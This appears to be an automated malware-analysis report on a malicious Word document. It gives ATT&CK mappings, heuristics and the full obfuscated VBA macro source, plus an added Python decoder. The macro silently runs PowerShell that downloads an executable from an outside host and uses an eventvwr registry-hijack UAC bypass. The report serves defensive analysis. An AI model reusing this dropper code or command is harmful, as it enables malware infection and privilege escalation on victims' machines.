MALICIOUS (Risk Score: 150)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros with a Document_Open entry point, so the code runs as soon as the document is opened with macros enabled. The macro declares the kernel32 WinExec API and calls it with nCmdShow = 0 (SW_HIDE) on a command line assembled from ten string fragments. Each fragment is padded with its own junk token (rrbw, BWdaA, xnmu, ytPOk, ggG4, nHKxC, QglW0, aRVf, UfRtT, SAmO7K) that the helper typeofDateserialIsdate strips with a VBScript.RegExp global replace; the cleaned fragments are then concatenated in a scrambled order. Decoded from the preview below, the command line is a hidden PowerShell one-liner that downloads https://gov-invoices.info/jobs/neuldr.exe with System.Net.WebClient to %TEMP%\<random number>.exe, writes that path as the default value of HKCU\Software\Classes\mscfile\shell\open\command, launches eventvwr.exe (the mscfile handler hijack used to run the payload with a UAC bypass), deletes the key again, and falls back to starting the file directly if no process of that name is found. The document is therefore a downloader/dropper stage: only the macro source was carved during analysis, not the second-stage binary, and signature scanning (ClamAV) did not flag the sample.
Heuristics (6)
- Reference to WinExec API [high] SC_STR_WINEXEC: Reference to WinExec API
- VBA macros detected [medium] OLE_VBA_MACROS (3 related findings): Document contains VBA macro code
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched lines in script:
    qbcolorBinaryGet = "vbscript.regexp"
    Set xorAscEvent = CreateObject(qbcolorBinaryGet)
    xorAscEvent.Global = True
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script:
    Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
    Sub Document_Open()
    eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6046 bytes | e5ed44ff03108f8dc8c96b6fc552d20f3b26a9d53baa749b3d1a651493a4d3d9 |
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 91 of 147 identifiers look randomly generated (e.g. 'BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWda'), consistent with name-mangling obfuscation. Note that the quoted example is a slice of one of the padded string literals in Document_Open rather than a variable name (the tokenizer counts words inside string literals too); the mangled identifiers proper are names such as typeofDateserialIsdate, qbcolorBinaryGet and curdirCstrCreateobject, which are VBA keywords glued together.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
rndIsdateCcur = typeofDateserialIsdate(" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA")
LdefdblL = typeofDateserialIsdate("bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu")
sendkeysCvarOptional = typeofDateserialIsdate("tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk")
byrefCbyteResume = typeofDateserialIsdate("'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4")
GexitG = typeofDateserialIsdate(" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC")
curdirCstrCreateobject = typeofDateserialIsdate("sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0")
meOptionEach = typeofDateserialIsdate("paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf")
koptionk = typeofDateserialIsdate("$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT")
clngSecondArray = typeofDateserialIsdate("(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K")
Dim caseSubCdec As String
Dim mxorm As Integer
mxorm = 0
caseSubCdec = meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
Call WinExec(caseSubCdec, mxorm)
End Sub
Function typeofDateserialIsdate(jpublishreportj As String, dwidthd As String) As String
Dim xorAscEvent As Object
Dim qbcolorBinaryGet As String
Dim doeventsSpaceError As String
qbcolorBinaryGet = "vbscript.regexp"
Set xorAscEvent = CreateObject(qbcolorBinaryGet)
xorAscEvent.Global = True
xorAscEvent.Pattern = dwidthd
doeventsSpaceError = xorAscEvent.Replace(jpublishreportj, "")
typeofDateserialIsdate = doeventsSpaceError
End Function
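The fragments in the preview above can be decoded offline by reproducing what typeofDateserialIsdate does (a VBScript.RegExp Global replace of the junk token with nothing) and joining the results in the order of the & expression handed to WinExec. The Python script below is an added example written for this page; it is not part of the analyzer or of the sample. It embeds the macro lines copied from the preview (the Attribute lines and the helper body are omitted), recovers the command line, reports whether WinExec was asked for a hidden window, and lists the URLs, registry paths and executable names it finds. The regex patterns for assignments, concatenation and the WinExec call are this example's own assumptions about the layout shown in the preview, not a general VBA parser.

```python
import re

# VBA source copied from this report's macros.bas preview. The Attribute lines and
# the body of typeofDateserialIsdate are omitted; that helper is a VBScript.RegExp
# Global Replace of its second argument with "" (see the preview above).
MACRO_SOURCE = r'''
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
rndIsdateCcur = typeofDateserialIsdate(" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA")
LdefdblL = typeofDateserialIsdate("bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu")
sendkeysCvarOptional = typeofDateserialIsdate("tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk")
byrefCbyteResume = typeofDateserialIsdate("'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4")
GexitG = typeofDateserialIsdate(" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC")
curdirCstrCreateobject = typeofDateserialIsdate("sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0")
meOptionEach = typeofDateserialIsdate("paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf")
koptionk = typeofDateserialIsdate("$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT")
clngSecondArray = typeofDateserialIsdate("(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K")
Dim caseSubCdec As String
Dim mxorm As Integer
mxorm = 0
caseSubCdec = meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
Call WinExec(caseSubCdec, mxorm)
End Sub
'''

# Assumed line shapes (they match this preview, not VBA in general):
#   <var> = <helper>("<payload with junk>", "<junk token>")
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*\w+\("(.*)",\s*"([^"]*)"\)\s*$', re.M)
#   <var> = a & b & c ...   (fragments concatenated in a scrambled order)
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$', re.M)
#   Call WinExec(<command line var>, <nCmdShow var>)
WINEXEC_RE = re.compile(r'Call\s+WinExec\((\w+),\s*(\w+)\)')


def strip_junk(payload: str, token: str) -> str:
    """Mirror VBScript.RegExp with Global = True and Replace(payload, "").
    The token is applied as a regex pattern, exactly as the macro does; the
    tokens in this sample contain no metacharacters, so it is a literal delete."""
    return re.sub(token, "", payload)


def decode_fragments(src: str) -> dict:
    """Map every fragment variable to its de-junked text."""
    return {name: strip_junk(payload, token) for name, payload, token in ASSIGN_RE.findall(src)}


def recover_command_line(src: str) -> str:
    """Follow the variable passed to WinExec back to its '&' concatenation and
    join the decoded fragments in that order, ignoring the source order."""
    frags = decode_fragments(src)
    call = WINEXEC_RE.search(src)
    if call is None:
        raise ValueError("no Call WinExec(...) found")
    target = call.group(1)
    for lhs, expr in CONCAT_RE.findall(src):
        if lhs == target:
            return "".join(frags[part.strip()] for part in expr.split("&"))
    raise ValueError(f"no concatenation assigns {target}")


def show_flag(src: str) -> int:
    """Resolve the integer assigned to WinExec's nCmdShow argument; 0 is SW_HIDE."""
    var = WINEXEC_RE.search(src).group(2)
    return int(re.search(rf'^\s*{var}\s*=\s*(\d+)\s*$', src, re.M).group(1))


def extract_iocs(cmd: str) -> dict:
    """Pull URLs, registry paths and executable names out of the decoded command line.
    Values are terminated by whitespace or the single quotes PowerShell uses here."""
    return {
        "urls": re.findall(r"https?://[^\s']+", cmd),
        "registry_keys": re.findall(r"HK(?:CU|LM|CR|U|CC)\\[^\s']+", cmd),
        "executables": sorted(set(re.findall(r"[\w-]+\.exe", cmd))),
    }


if __name__ == "__main__":
    cmd = recover_command_line(MACRO_SOURCE)
    print("nCmdShow =", show_flag(MACRO_SOURCE), "(0 = SW_HIDE)")
    for stmt in cmd.split(";"):   # one PowerShell statement per line for reading
        print(stmt)
    print(extract_iocs(cmd))
```

Run stand-alone, the script prints the recovered PowerShell one-liner statement by statement: a WScript.Shell and a WebClient are created, the URL list is built from the embedded string, the payload is saved as %TEMP%\<random 1..65535>.exe, its path is written to the mscfile\shell\open\command default value, eventvwr.exe is started, the key is deleted after a 3 s sleep, and the file is started directly if no process of that name exists. The decoder only reproduces the macro's string handling; it performs no network or registry access, and the URL it recovers should be handled as an indicator, not fetched outside a sandbox.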